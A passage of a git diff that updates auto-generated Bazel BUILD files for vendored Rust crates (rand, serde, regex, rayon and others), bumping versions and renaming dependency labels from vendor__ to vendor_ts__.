# x86_64-unknown-linux-gnu - ], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel new file mode 100644 index 000000000000..9dc571cda9a3 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel @@ -0,0 +1,97 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "rand", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "alloc", + "default", + "os_rng", + "small_rng", + "std", + "std_rng", + "thread_rng", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=rand", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.9.0", + deps = [ + "@vendor_ts__rand_chacha-0.9.0//:rand_chacha", + "@vendor_ts__rand_core-0.9.2//:rand_core", + "@vendor_ts__zerocopy-0.8.20//:zerocopy", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel index 80c48fd82252..eb188225fa44 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel @@ -32,7 +32,7 @@ rust_library( "std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -82,9 +82,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.3.1", + version = "0.9.0", deps = [ - "@vendor__ppv-lite86-0.2.20//:ppv_lite86", - "@vendor__rand_core-0.6.4//:rand_core", + "@vendor_ts__ppv-lite86-0.2.20//:ppv_lite86", + "@vendor_ts__rand_core-0.9.2//:rand_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel index f3d96b8a33c7..79af89a699ed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel @@ -29,12 +29,11 @@ rust_library( ], ), crate_features = [ - "alloc", - "getrandom", + "os_rng", "std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -84,8 +83,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.6.4", + version = "0.9.2", deps = [ - "@vendor__getrandom-0.2.15//:getrandom", + "@vendor_ts__getrandom-0.3.1//:getrandom", + "@vendor_ts__zerocopy-0.8.20//:zerocopy", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel index abe95003d292..f84dc0969f2c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.10.0", deps = [ - "@vendor__either-1.13.0//:either", - "@vendor__rayon-core-1.12.1//:rayon_core", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__rayon-core-1.12.1//:rayon_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel index 2abb8caa8698..53bd8e6fe3d6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel @@ -82,9 +82,9 @@ rust_library( }), version = "1.12.1", deps = [ - "@vendor__crossbeam-deque-0.8.6//:crossbeam_deque", - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", - "@vendor__rayon-core-1.12.1//:build_script_build", + "@vendor_ts__crossbeam-deque-0.8.6//:crossbeam_deque", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__rayon-core-1.12.1//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel index f9f0c89fa5ec..adc812c3df5a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.5.8", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", + "@vendor_ts__bitflags-2.8.0//:bitflags", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel index e0a2b9880c24..0399f3132c64 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel @@ -100,9 +100,9 @@ rust_library( }), version = "1.11.1", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__regex-automata-0.4.9//:regex_automata", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__regex-automata-0.4.9//:regex_automata", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel index 1978a52d5c2d..59e85402070a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.1.10", deps = [ - "@vendor__regex-syntax-0.6.29//:regex_syntax", + "@vendor_ts__regex-syntax-0.6.29//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel index f16dfc66ef22..02062f8053c7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel @@ -107,8 +107,8 @@ rust_library( }), version = "0.4.9", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel index b35e36f48ccf..f2f46f442a8c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel @@ -81,10 +81,10 @@ rust_library( }), version = "0.15.15", deps = [ - "@vendor__countme-3.0.1//:countme", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__memoffset-0.9.1//:memoffset", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__countme-3.0.1//:countme", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__memoffset-0.9.1//:memoffset", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel index 37220a441d57..4fef93e46326 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel @@ -83,5 +83,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.1.0", + version = "2.1.1", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel new file mode 100644 index 000000000000..82ce1ee93122 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel @@ -0,0 +1,83 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "rustc_stable_hash", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=rustc-stable-hash", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.1.1", +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel index 37b394fcebad..00e80306ea45 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel @@ -82,9 +82,9 @@ rust_library( }), version = "0.2.1+llvm-462a31f5a5ab", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:build_script_build", - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__bitflags-1.3.2//:bitflags", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:build_script_build", + "@vendor_ts__smallvec-1.14.0//:smallvec", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel index 95adbd009780..eb7d8b9c8f12 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.18", + version = "1.0.19", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel index 416211ad6a0f..823e6471df3b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel @@ -82,13 +82,13 @@ rust_library( version = "1.0.6", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel index 2ebe5dba7841..c05cc8b555ee 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel @@ -87,8 +87,8 @@ rust_library( }), version = "1.0.24", deps = [ - "@vendor__semver-1.0.24//:build_script_build", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__semver-1.0.24//:build_script_build", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel index d11c7ab0b963..df8589a8859e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel @@ -39,7 +39,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -90,9 +90,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.217", + version = "1.0.218", deps = [ - "@vendor__serde-1.0.217//:build_script_build", + "@vendor_ts__serde-1.0.218//:build_script_build", ], ) @@ -148,7 +148,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.217", + version = "1.0.218", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel index 5e70c8e29a67..ec591a096a13 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel @@ -82,10 +82,10 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.217", + version = "1.0.218", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel index 8acb6187cdd9..747fcb93840c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel @@ -85,13 +85,13 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.135", + version = "1.0.139", deps = [ - "@vendor__itoa-1.0.14//:itoa", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__ryu-1.0.18//:ryu", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:build_script_build", + "@vendor_ts__itoa-1.0.14//:itoa", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__ryu-1.0.19//:ryu", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:build_script_build", ], ) @@ -145,7 +145,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.135", + version = "1.0.139", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel index e0565b9afff0..f57f3f118ffa 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.6.8", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel index 8a6cf4d7f4dc..913a64f240a8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel @@ -37,8 +37,8 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", - "@vendor__serde_with_macros-3.12.0//:serde_with_macros", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", + "@vendor_ts__serde_with_macros-3.12.0//:serde_with_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -91,6 +91,6 @@ rust_library( }), version = "3.12.0", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel index c4748cafea99..28a15ef4179e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel @@ -81,9 +81,9 @@ rust_proc_macro( }), version = "3.12.0", deps = [ - "@vendor__darling-0.20.10//:darling", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__darling-0.20.10//:darling", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel index d1d5a34b6a64..9a863536b9e2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel @@ -81,10 +81,10 @@ rust_library( }), version = "0.9.34+deprecated", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itoa-1.0.14//:itoa", - "@vendor__ryu-1.0.18//:ryu", - "@vendor__serde-1.0.217//:serde", - "@vendor__unsafe-libyaml-0.2.11//:unsafe_libyaml", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itoa-1.0.14//:itoa", + "@vendor_ts__ryu-1.0.19//:ryu", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__unsafe-libyaml-0.2.11//:unsafe_libyaml", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel index af217a122bbb..e978ca25cd6e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.7", deps = [ - "@vendor__lazy_static-1.5.0//:lazy_static", + "@vendor_ts__lazy_static-1.5.0//:lazy_static", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel index 6c353706f276..1e4a6aa9f73c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel @@ -84,5 +84,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.13.2", + version = "1.14.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel deleted file mode 100644 index 6f9bfbbbe67f..000000000000 --- 